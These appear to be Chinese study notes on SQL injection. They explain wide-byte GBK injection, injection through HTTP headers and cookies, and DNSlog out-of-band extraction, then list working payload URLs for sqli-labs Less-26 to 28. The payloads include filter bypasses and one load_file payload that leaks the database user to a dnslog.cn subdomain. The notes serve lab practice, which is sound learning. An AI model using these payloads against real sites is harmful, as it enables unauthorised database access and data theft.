第五天快http头部信息注入cooik（http 头部信息）

复显今天的内容宽子节client_ip以及X_FORWARDED_FOR的利用

Sql相关的转义字符函数

在mysql中，用于转义（即在字符串中的符号前加上”\”）的函数有addslashes，mysql_real_escape_string，mysql_escape_string等，还有一种情况是magic_quote_gpc，不过高版本的PHP将去除这个特性。

定义和用法

addslashes（）函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是：

单引号（）双引号(")反斜杠（八） NULL

涉及到的基本概念

字符、字符集

字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(encoding)来确定这个字符在该字符集中的位置。

UTF8

由于ASCII表示的字符只有128个，因此网络世界的规范是使用UNICODE编码，但是用ASCII表示的字符使用UNICODE并不高效。因此出现了中间格式字符集，被称为通用转换格式，及UTF(Universal Transformation Format)。

宽字节

GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。

如果使用了类似于set names gbki这样得语句，此时mysq数据库就会将

Asci大于128(%d州得字符当作是汉字字符得一部分，从而能吃掉，引入单引号或者双号

宽字节注入原理：

GBK 占用两字节

ASCII占用一字节

PHP中编码为GBK，函数执行添加的是ASCII编码（添加的符号为“\”），MYSQL默认字符集是GBK等宽字节字符集。

大家都知道%df’ 被PHP转义（开启GPC、用addslashes函数，或者icov等），单引号被加上反斜杠\，变成了 %df\’，其中\的十六进制是 %5C ，那么现在 %df\’ =%df%5c%27，如果程序的默认字符集是GBK等宽字节字符集，则MySQL用GBK的编码时，会认为 %df%5c 是一个宽字符，也就是縗，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就好注入了。

简单的宽字节注入

Sqli –less 35 存在 addslashes

于是尝试宽字节注入：

获取当前数据库名:

总结：
宽字节注入原理即是利用编码转换，将服务器端强制添加的本来用于转义的\符号吃掉，从而能使攻击者输入的引号起到闭合作用，以至于可以进行SQL注入。

User-agent注入

一、什么是User-Agent

User-Agent是Http协议中的一部分，属于头域的组成部分，User Agent也简称UA。用较为普通的一点来说，是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。UA字符串在每次浏览器 HTTP 请求时发送到服务器！

浏览器UA 字串的标准格式为： 浏览器标识 (操作系统标识; 加密等级标识; 浏览器语言) 渲染引擎标识 版本信息

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('' or updatexml(1, concat('#', database()), 0), 1, 1) #

' or updatexml(1, concat('#', database()), 0), 1, 1) #

伪造IP注入：Client-ip

getenv
get 获得
env===>environment 环境

getenv 获得环境变量 $_SERVER

X-Forwarded-For注入

X-Forwarded-For（XFF）是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。进入环境，打开跳转页

$_SERVER['HTTP_USER_AGENT'] ====> user-agent
$_SERVER['HTTP_CLIENT_IP'] =====> client-ip
$_SERVER['HTTP_X_FORWARDED_FOR']=====> x-forwarded-for

发现 HTTP_XXX 都是可以通过控制对应的请求包中的头部的值来控制

SERVER注入

Cookie注入

cookie注入原理其实很简单，就是利用了session机制中的特性，只能说是特性，不能算是漏洞。

这里简单的说下原理，session的机制就相当于你有一张蛋糕店的会员卡，这张会员卡就是你浏览器中的cookie，上边有你的id号等信息，但是是否有效和有多少余额只能由店里边的柜员机决定，这个柜员机就是服务器上的session管理器，注入就好比有人偷偷的复制了你的会员卡（cookie），拿去店里消费，店里的柜员机看到信息相符就处理了。

什么是dnslog注入？

dnslog注入也可以称之为dns带外查询，是一种注入姿势，可以通过查询相应的dns解析记录，来获取我们想要的数据

为什么要进行dnslog注入？

一般情况下，在我们无法通过联合查询直接获取数据的情况下，我们只能通过盲注，来一步步的获取数据，但是，使用盲注，手工测试是需要花费大量的时间的，可能会想到使用sqlmap直接去跑出数据，但在实际测试中，使用sqlmap跑盲注，有很大的几率，网站把ip给封掉，这就影响了我们的测试进度，也许你也可以使用代理池。。。

知识扩展

首先说明，dns带外查询属于MySQL注入，在MySQL中有个系统属性

secure_file_priv特性，有三种状态

secure_file_priv为null 表示不允许导入导出

secure_file_priv指定文件夹时，表示mysql的导入导出只能发生在指定的文件夹

secure_file_priv没有设置时，则表示没有任何限制

可了解一下load_file和outfile

LOAD_FILE()函数

LOAD_FILE()函数读取一个文件并将其内容作为字符串返回

语法为：load_file(file_name)，其中file_name是文件的完整路径

此函数使用需要满足的条件

文件必须位于服务器主机上

你必须具有该FILE权限才能读取该文件。拥有该FILE权限的用户可以读取服务器主机上的任何文件，该文件是world-readable的或MySQL服务器可读的，此属性与secure_file_priv状态相关

文件必须是所有人都可读的，并且它的大小小于max_allowed_packet字节

UNC路径

什么是UNC路径？

UNC路径就是类似\\softer这样的形式的网络路径。它符合 \\servername\sharename 格式，其中 servername 是服务器名，sharename 是共享资源的名称。

目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：\\servername\sharename\directory\filename。

例如把自己电脑的文件共享，你会获得如下路径，这就是UNC路径

//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

DNSLOG平台

http://www.dnslog.cn

http://admin.dnslog.link

http://ceye.io

解决特殊符号问题

26-27-28

Sqli less -26

联合查询注入

这一关过滤了and 空格 or

And和or可以用%26%26双写绕过 空格可以用()绕过

http://www.sqli.com/Less-26/?id=0%27union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479));%00

成功语句

SELECT * FROM users WHERE id='0'union(select(1),group_concat(table_name),user()from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479))

报错注入

http://www.sqli.com/Less-26/?id=1%27||%20(select%20(extractvalue(1,concat(0x7e,(select%20(group_concat(table_name))%20from%20(infoorrmation_schema.tables)%20where%20(table_schema=0x7365637572697479))))));%00

Bool注入

http://www.sqli.com/Less-26/?id=1%27%26%26(ascii(substr(user(),1,1))%3E114%20%23);%00

时间注入

26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1

Sqli less -27

字符型 可难是 id=’1’ 单引号闭合

联合查询

http://www.sqli.com/less-27/?id=0%27%09uNion%09seLect%091,group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=0x7365637572697479;%00

报错注入

http://www.sqli.com/less-27/?id=1%27%09and%09extractvalue(1,concat(0x7e,(seLect%09group_concat(schema_name)%09from%09information_schema.schemata)));%00

Bool注入

时间注入

26/?id=1%27%26%26if(ascii(substr(user(),1,1))=114%20%23,sleep(3),1);%00 HTTP/1.1

Sqli less -28

联合查询注入

http://www.sqli.com/Less-28/?id=0%27)union(select(1),group_concat(table_name),3%09from%09information_schema.tables%09where%09table_schema=%27security%27);%00

Bool 时间注入

http://www.sqli.com/Less-28/?id=0%27)and%09if(ascii(substr(user(),1,1))=114%09,sleep(5),1);%00

DNS注入

http://www.sqli.com/Less-28/?id=0%27)%09and%09(select%09load_file(concat(%27\\\\%27,(select%09hex(user())),%27.3rq4km.dnslog.cn\abc%27)));%00

/有点问题